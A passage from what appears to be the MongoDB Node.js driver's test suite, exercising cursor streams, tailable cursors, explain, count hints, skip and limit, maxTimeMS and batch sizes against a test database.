configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('Should_be_able_to_stream_documents', function(err, collection) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var paused = 0, closed = 0, resumed = 0, i = 0; var stream = collection.find().stream(); stream.on('data', function(doc) { test.equal(true, !!doc); test.equal(true, !!doc.a); count = count + 1; if (paused > 0 && 0 === resumed) { err = new Error('data emitted during pause'); return testDone(); } if (++i === 3) { stream.pause(); paused++; setTimeout(function() { stream.resume(); resumed++; }, 20); } }); stream.once('error', function(er) { err = er; testDone(); }); stream.once('end', function() { closed++; testDone(); }); function testDone() { test.equal(null, err); test.equal(i, docs.length); test.equal(1, closed); test.equal(1, paused); test.equal(1, resumed); test.strictEqual(stream.isClosed(), true); client.close(); done(); } }); }); }); } }); /** * @ignore * @api private */ it('immediately destroying a stream prevents the query from executing', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var i = 0, docs = [{ b: 2 }, { b: 3 }], doneCalled = 0; var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection( 'immediately_destroying_a_stream_prevents_the_query_from_executing', function(err, collection) { test.equal(null, err); // insert all docs 
collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var stream = collection.find().stream(); stream.on('data', function() { i++; }); stream.once('close', testDone('close')); stream.once('error', testDone('error')); stream.destroy(); function testDone() { return function(err) { ++doneCalled; if (doneCalled === 1) { test.equal(undefined, err); test.strictEqual(0, i); test.strictEqual(true, stream.isClosed()); client.close(); done(); } }; } }); } ); }); } }); /** * @ignore * @api private */ it('destroying a stream stops it', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db.createCollection('destroying_a_stream_stops_it', function(err, collection) { test.equal(null, err); var docs = []; for (var ii = 0; ii < 10; ++ii) docs.push({ b: ii + 1 }); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var finished = 0, i = 0; var stream = collection.find().stream(); test.strictEqual(false, stream.isClosed()); stream.on('data', function() { if (++i === 5) { stream.destroy(); } }); stream.once('close', testDone); stream.once('error', testDone); function testDone(err) { ++finished; setTimeout(function() { test.strictEqual(undefined, err); test.strictEqual(5, i); test.strictEqual(1, finished); test.strictEqual(true, stream.isClosed()); client.close(); done(); }, 150); } }); }); }); } }); /** * @ignore * @api private */ it('cursor stream errors', { // Add a tag that our runner can trigger on // in this case we are 
setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; if (configuration.usingUnifiedTopology()) { // skipped for direct legacy variable inspection return this.skip(); } var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db.createCollection('cursor_stream_errors', function(err, collection) { test.equal(null, err); var docs = []; for (var ii = 0; ii < 10; ++ii) docs.push({ b: ii + 1 }); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var finished = 0, i = 0; var stream = collection.find({}, { batchSize: 5 }).stream(); stream.on('data', function() { if (++i === 4) { // Force restart configuration.manager.stop(9); } }); stream.once('close', testDone('close')); stream.once('error', testDone('error')); function testDone() { return function() { ++finished; if (finished === 2) { setTimeout(function() { test.equal(5, i); test.equal(true, stream.isClosed()); client.close(); configuration.manager.start().then(function() { done(); }); }, 150); } }; } }); }); }); } }); /** * @ignore * @api private */ it('cursor stream errors connection force closed', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { mongodb: '<=3.5.0', // NOTE: remove this when SERVER-30576 is resolved topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); 
db.createCollection('cursor_stream_errors', function(err, collection) { test.equal(null, err); var docs = []; for (var ii = 0; ii < 10; ++ii) docs.push({ b: ii + 1 }); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var finished = 0, i = 0; var stream = collection.find({}, { batchSize: 5 }).stream(); stream.on('data', function() { if (++i === 5) { client.topology .connections()[0] .write(Buffer.from('312312321321askdjljsaNCKnablibh')); } }); stream.once('close', testDone('close')); stream.once('error', testDone('error')); function testDone() { return function() { ++finished; if (finished === 2) { setTimeout(function() { test.equal(5, i); test.equal(2, finished); test.equal(true, stream.isClosed()); client.close(); done(); }, 150); } }; } }); }); }); } }); /** * @ignore * @api private */ it('cursor stream pipe', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('cursor_stream_pipe', function(err, collection) { test.equal(null, err); var docs = []; 'Aaden Aaron Adrian Aditya Bob Joe'.split(' ').forEach(function(name) { docs.push({ name: name }); }); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var filename = '/tmp/_nodemongodbnative_stream_out.txt', out = fs.createWriteStream(filename); // hack so we don't need to create a stream filter just to // stringify the objects (otherwise the created file would // just contain a bunch of [object Object]) // var 
toString = Object.prototype.toString; // Object.prototype.toString = function () { // return JSON.stringify(this); // } var stream = collection.find().stream({ transform: function(doc) { return JSON.stringify(doc); } }); stream.pipe(out); // Wait for output stream to close out.on('close', testDone); function testDone(err) { // Object.prototype.toString = toString; test.strictEqual(undefined, err); var contents = fs.readFileSync(filename, 'utf8'); test.ok(/Aaden/.test(contents)); test.ok(/Aaron/.test(contents)); test.ok(/Adrian/.test(contents)); test.ok(/Aditya/.test(contents)); test.ok(/Bob/.test(contents)); test.ok(/Joe/.test(contents)); fs.unlinkSync(filename); client.close(); done(); } }); }); }); } }); /** * @ignore */ it('shouldCloseDeadTailableCursors', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] }, sessions: { skipLeakTests: true } }, // The actual test we wish to run test: function(done) { // http://www.mongodb.org/display/DOCS/Tailable+Cursors var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var options = { capped: true, size: 10000000 }; db.createCollection('test_if_dead_tailable_cursors_close', options, function( err, collection ) { test.equal(null, err); var closeCount = 0; var errorOccurred = false; var count = 100; // Just hammer the server for (var i = 0; i < 100; i++) { collection.insert({ id: i }, { w: 'majority', wtimeout: 5000 }, function(err) { test.equal(null, err); count = count - 1; if (count === 0) { var stream = collection.find({}, { tailable: true, awaitData: true }).stream(); // let index = 0; stream.resume(); stream.on('error', function(err) { expect(err).to.exist; errorOccurred = 
true; }); var validator = () => { closeCount++; if (closeCount === 2) { expect(errorOccurred).to.equal(true); done(); } }; stream.on('end', validator); stream.on('close', validator); // Just hammer the server for (var i = 0; i < 100; i++) { const id = i; process.nextTick(function() { collection.insert({ id }, function(err) { test.equal(null, err); if (id === 99) { setTimeout(() => client.close()); } }); }); } } }); } }); }); } }); /** * @ignore */ it('shouldAwaitData', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { // http://www.mongodb.org/display/DOCS/Tailable+Cursors var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var options = { capped: true, size: 8 }; db.createCollection('should_await_data', options, function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create cursor with awaitdata, and timeout after the period specified var cursor = collection.find({}, { tailable: true, awaitdata: true }); // Execute each cursor.each(function(err, result) { if (result) { cursor.kill(); } if (err != null) { // Even though cursor is exhausted, should not close session // // unless cursor is manually closed, due to awaitdata / tailable cursor.close(); client.close(); done(); } }); }); }); }); } }); /** * @ignore */ it('shouldAwaitDataWithDocumentsAvailable', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 
'wiredtiger'] } }, // The actual test we wish to run test: function(done) { // http://www.mongodb.org/display/DOCS/Tailable+Cursors var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var options = { capped: true, size: 8 }; db.createCollection('should_await_data_no_docs', options, function(err, collection) { test.equal(null, err); // Create cursor with awaitdata, and timeout after the period specified var cursor = collection.find({}, { tailable: true, awaitdata: true }); var rewind = cursor.rewind; var called = false; cursor.rewind = function() { called = true; }; cursor.each(function(err) { if (err != null) { test.ok(called); cursor.rewind = rewind; client.close(); done(); } }); }); }); } }); /** * @ignore */ it('shouldAwaitDataUsingCursorFlag', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { // http://www.mongodb.org/display/DOCS/Tailable+Cursors var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var options = { capped: true, size: 8 }; db.createCollection('should_await_data_cursor_flag', options, function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create cursor with awaitdata, and timeout after the period specified var cursor = collection.find({}, {}); cursor.addCursorFlag('tailable', true); cursor.addCursorFlag('awaitData', true); cursor.each(function(err) { if (err != null) { // 
Even though cursor is exhausted, should not close session // unless cursor is manually closed, due to awaitdata / tailable cursor.close(); client.close(); done(); } else { cursor.kill(); } }); }); }); }); } }); /** * @ignore */ /* it('shouldNotAwaitDataWhenFalse = { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { // NODE-98 var db = configuration.newClient(configuration.writeConcernMax(), {poolSize:1, auto_reconnect:false}); db.open(function(err, db) { var options = { capped: true, size: 8}; db.createCollection('should_not_await_data_when_false', options, function(err, collection) { collection.insert({a:1}, configuration.writeConcernMax(), function(err, result) { // should not timeout collection.find({}, {tailable:true, awaitdata:false}).each(function(err, result) { test.ok(err != null); }); client.close(); done(); }); }); }); } } */ /** * @ignore */ it('Should correctly retry tailable cursor connection', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { // http://www.mongodb.org/display/DOCS/Tailable+Cursors var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var options = { capped: true, size: 8 }; db.createCollection('should_await_data', options, function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create cursor with awaitdata, 
and timeout after the period specified var cursor = collection.find({}, { tailable: true, awaitdata: true }); cursor.each(function(err) { if (err != null) { // kill cursor b/c cursor is tailable / awaitable cursor.close(); client.close(); done(); } else { cursor.kill(); } }); }); }); }); } }); /** * @ignore */ it('shouldCorrectExecuteExplainHonoringLimit', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; docs[0] = { _keywords: [ 'compact', 'ii2gd', 'led', '24-48v', 'presse-etoupe', 'bexbgl1d24483', 'flash', '48v', 'eexd', 'feu', 'presse', 'compris', 'rouge', 'etoupe', 'iic', 'ii2gdeexdiict5', 'red', 'aet' ] }; docs[1] = { _keywords: [ 'reducteur', '06212', 'd20/16', 'manch', 'd20', 'manchon', 'ard', 'sable', 'irl', 'red' ] }; docs[2] = { _keywords: [ 'reducteur', '06214', 'manch', 'd25/20', 'd25', 'manchon', 'ard', 'sable', 'irl', 'red' ] }; docs[3] = { _keywords: [ 'bar', 'rac', 'boite', '6790178', '50-240/4-35', '240', 'branch', 'coulee', 'ddc', 'red', 'ip2x' ] }; docs[4] = { _keywords: [ 'bar', 'ip2x', 'boite', '6790158', 'ddi', '240', 'branch', 'injectee', '50-240/4-35?', 'red' ] }; docs[5] = { _keywords: [ 'bar', 'ip2x', 'boite', '6790179', 'coulee', '240', 'branch', 'sdc', '50-240/4-35?', 'red', 'rac' ] }; docs[6] = { _keywords: [ 'bar', 'ip2x', 'boite', '6790159', '240', 'branch', 'injectee', '50-240/4-35?', 'sdi', 'red' ] }; docs[7] = { _keywords: [ '6000', 'r-6000', 'resin', 'high', '739680', 'red', 'performance', 'brd', 'with', 'ribbon', 'flanges' ] }; docs[8] = { _keywords: ['804320', 'for', 'paint', 'roads', 'brd', 'red'] }; docs[9] = { _keywords: ['38mm', 'padlock', 'safety', '813594', 'brd', 'red'] }; docs[10] = { _keywords: ['114551', 'r6900', 'for', 'red', 'bmp71', 'brd', 'ribbon'] }; docs[11] = { 
_keywords: ['catena', 'diameter', '621482', 'rings', 'brd', 'legend', 'red', '2mm'] }; docs[12] = { _keywords: ['catena', 'diameter', '621491', 'rings', '5mm', 'brd', 'legend', 'red'] }; docs[13] = { _keywords: ['catena', 'diameter', '621499', 'rings', '3mm', 'brd', 'legend', 'red'] }; docs[14] = { _keywords: ['catena', 'diameter', '621508', 'rings', '5mm', 'brd', 'legend', 'red'] }; docs[15] = { _keywords: [ 'insert', 'for', 'cable', '3mm', 'carrier', '621540', 'blank', 'brd', 'ademark', 'red' ] }; docs[16] = { _keywords: [ 'insert', 'for', 'cable', '621544', '3mm', 'carrier', 'brd', 'ademark', 'legend', 'red' ] }; docs[17] = { _keywords: ['catena', 'diameter', '6mm', '621518', 'rings', 'brd', 'legend', 'red'] }; docs[18] = { _keywords: ['catena', 'diameter', '621455', '8mm', 'rings', 'brd', 'legend', 'red'] }; docs[19] = { _keywords: ['catena', 'diameter', '621464', 'rings', '5mm', 'brd', 'legend', 'red'] }; var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); // Insert all the docs var collection = db.collection('shouldCorrectExecuteExplainHonoringLimit'); collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection.ensureIndex({ _keywords: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection .find({ _keywords: 'red' }, {}, { explain: true }) .limit(10) .toArray(function(err, result) { test.equal(null, err); test.ok(result != null); collection .find({ _keywords: 'red' }, {}) .limit(10) .explain(function(err, result) { test.equal(null, err); test.ok(result != null); client.close(); done(); }); }); }); }); }); } }); /** * @ignore */ it('shouldNotExplainWhenFalse', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { 
topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var doc = { name: 'camera', _keywords: ['compact', 'ii2gd', 'led', 'red', 'aet'] }; var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var collection = db.collection('shouldNotExplainWhenFalse'); collection.insert(doc, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection .find({ _keywords: 'red' }, {}, { explain: false }) .limit(10) .toArray(function(err, result) { test.equal(null, err); test.equal('camera', result[0].name); client.close(); done(); }); }); }); } }); /** * @ignore */ it('shouldFailToSetReadPreferenceOnCursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); try { db .collection('shouldFailToSetReadPreferenceOnCursor') .find() .setReadPreference('notsecondary'); test.ok(false); } catch (err) {} // eslint-disable-line db .collection('shouldFailToSetReadPreferenceOnCursor') .find() .setReadPreference('secondary'); client.close(); done(); }); } }); /** * @ignore * @api private */ it('shouldNotFailDueToStackOverflowEach', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run 
test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('shouldNotFailDueToStackOverflowEach', function(err, collection) { test.equal(null, err); var docs = []; var total = 0; for (var i = 0; i < 30000; i++) docs.push({ a: i }); var allDocs = []; var left = 0; while (docs.length > 0) { allDocs.push(docs.splice(0, 1000)); } // Get all batches we must insert left = allDocs.length; var totalI = 0; // Execute inserts for (i = 0; i < left; i++) { collection.insert(allDocs.shift(), configuration.writeConcernMax(), function(err, d) { test.equal(null, err); left = left - 1; totalI = totalI + d.length; if (left === 0) { collection.find({}).each(function(err, item) { test.equal(null, err); if (item == null) { test.equal(30000, total); client.close(); done(); } else { total++; } }); } }); } }); }); } }); /** * @ignore * @api private */ it('shouldNotFailDueToStackOverflowToArray', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('shouldNotFailDueToStackOverflowToArray', function(err, collection) { test.equal(null, err); var docs = []; for (var i = 0; i < 30000; i++) docs.push({ a: i }); var allDocs = []; var left = 0; while (docs.length > 0) { allDocs.push(docs.splice(0, 1000)); } // Get all batches we must insert left = allDocs.length; var totalI = 0; var timeout = 0; // Execute inserts 
for (i = 0; i < left; i++) { setTimeout(function() { collection.insert(allDocs.shift(), configuration.writeConcernMax(), function(err, d) { test.equal(null, err); left = left - 1; totalI = totalI + d.length; if (left === 0) { collection.find({}).toArray(function(err, items) { test.equal(null, err); test.equal(30000, items.length); client.close(); done(); }); } }); }, timeout); timeout = timeout + 100; } }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlySkipAndLimit', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var collection = db.collection('shouldCorrectlySkipAndLimit'); var docs = []; for (var i = 0; i < 100; i++) docs.push({ a: i, OrderNumber: i }); collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection .find({}, { OrderNumber: 1 }) .skip(10) .limit(10) .toArray(function(err, items) { test.equal(null, err); test.equal(10, items[0].OrderNumber); collection .find({}, { OrderNumber: 1 }) .skip(10) .limit(10) .count(true, function(err, count) { test.equal(null, err); test.equal(10, count); client.close(); done(); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldFailToTailANormalCollection', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = 
configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var collection = db.collection('shouldFailToTailANormalCollection'); var docs = []; for (var i = 0; i < 100; i++) docs.push({ a: i, OrderNumber: i }); collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); const cursor = collection.find({}, { tailable: true }); cursor.each(function(err) { test.ok(err instanceof Error); test.ok(typeof err.code === 'number'); // Close cursor b/c we did not exhaust cursor cursor.close(); client.close(); done(); }); }); }); } }); /** * @ignore */ it('shouldCorrectlyUseFindAndCursorCount', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); // DOC_LINE var client = new MongoClient(new Server('localhost', 27017)); // DOC_START // Establish connection to db client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); // Create a lot of documents to insert var docs = []; for (var i = 0; i < 100; i++) { docs.push({ a: i }); } // Create a collection db.createCollection('test_close_function_on_cursor_2', function(err, collection) { test.equal(null, err); // Insert documents into collection collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection.find({}, function(err, cursor) { test.equal(null, err); cursor.count(function(err, count) { test.equal(null, err); test.equal(100, count); client.close(); done(); }); }); }); }); }); // DOC_END } }); /** * @ignore */ it('should correctly apply 
hint to count command for cursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'], mongodb: '>2.5.5' } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); // DOC_LINE var client = new MongoClient(new Server('localhost', 27017)); // DOC_START // Establish connection to db client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var col = db.collection('count_hint'); col.insert([{ i: 1 }, { i: 2 }], { w: 1 }, function(err) { test.equal(null, err); col.ensureIndex({ i: 1 }, function(err) { test.equal(null, err); col.find({ i: 1 }, { hint: '_id_' }).count(function(err, count) { test.equal(null, err); test.equal(1, count); col.find({}, { hint: '_id_' }).count(function(err, count) { test.equal(null, err); test.equal(2, count); col.find({ i: 1 }, { hint: 'BAD HINT' }).count(function(err) { test.ok(err != null); col.ensureIndex({ x: 1 }, { sparse: true }, function(err) { test.equal(null, err); col.find({ i: 1 }, { hint: 'x_1' }).count(function(err, count) { test.equal(null, err); test.equal(0, count); col.find({}, { hint: 'i_1' }).count(function(err, count) { test.equal(null, err); test.equal(2, count); client.close(); done(); }); }); }); }); }); }); }); }); }); // DOC_END } }); /** * @ignore */ it('Terminate each after first document by returning false', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = 
configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); // Create a lot of documents to insert var docs = []; for (var i = 0; i < 100; i++) { docs.push({ a: i }); } // Create a collection db.createCollection('terminate_each_returning_false', function(err, collection) { test.equal(null, err); // Insert documents into collection collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var finished = false; collection.find({}).each(function(err, doc) { test.equal(null, err); if (doc) { test.equal(finished, false); finished = true; client.close(); done(); return false; } }); }); }); }); } }); /** * @ignore */ it('Should correctly handle maxTimeMS as part of findOne options', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var donkey = { color: 'brown' }; db.collection('donkies').insertOne(donkey, function(err, result) { test.equal(null, err); var query = { _id: result.insertedId }; var options = { maxTimeMS: 1000 }; db.collection('donkies').findOne(query, options, function(err, doc) { test.equal(null, err); test.equal('brown', doc.color); client.close(); done(); }); }); }); } }); /** * @ignore */ it('Should correctly handle batchSize of 2', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 
'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db .collection('should_correctly_handle_batchSize_2') .insert([{ x: 1 }, { x: 2 }, { x: 3 }], function(err) { test.equal(null, err); db .collection('should_correctly_handle_batchSize_2') .find({}, { batchSize: 2 }, function(error, cursor) { test.equal(null, err); cursor.next(function(err) { test.equal(null, err); cursor.next(function(err) { test.equal(null, err); cursor.next(function(err) { client.close(); test.equal(null, err); done(); }); }); }); }); }); }); } }); /** * @ignore */ it('Should report database name and collection name', { metadata: { requires: { topology: ['single'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db.collection('myCollection').find({}, function(error, cursor) { test.equal(null, err); test.equal('myCollection', cursor.namespace.collection); test.equal('integration_tests', cursor.namespace.database); client.close(); done(); }); }); } }); /** * @ignore * @api private */ it('Should correctly execute count on cursor with maxTimeMS', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = 
configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('Should_correctly_execute_count_on_cursor_2', function( err, collection ) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection.find({}); cursor.limit(100); cursor.skip(10); cursor.count(true, { maxTimeMS: 1000 }, function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection.find({}); cursor.limit(100); cursor.skip(10); cursor.maxTimeMS(100); cursor.count(function(err) { test.equal(null, err); client.close(); done(); }); }); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly execute count on cursor with maxTimeMS set using legacy method', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('Should_correctly_execute_count_on_cursor_3', function( err, collection ) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection.find({}, { maxTimeMS: 100 }); cursor.toArray(function(err) { test.equal(null, err); client.close(); done(); }); }); 
}); }); } }); /** * @ignore * @api private */ it('Should correctly apply map to toArray', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('map_toArray'); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection .find({}) .map(function() { return { a: 1 }; }) .batchSize(5) .limit(10); cursor.toArray(function(err, docs) { test.equal(null, err); test.equal(10, docs.length); // Ensure all docs where mapped 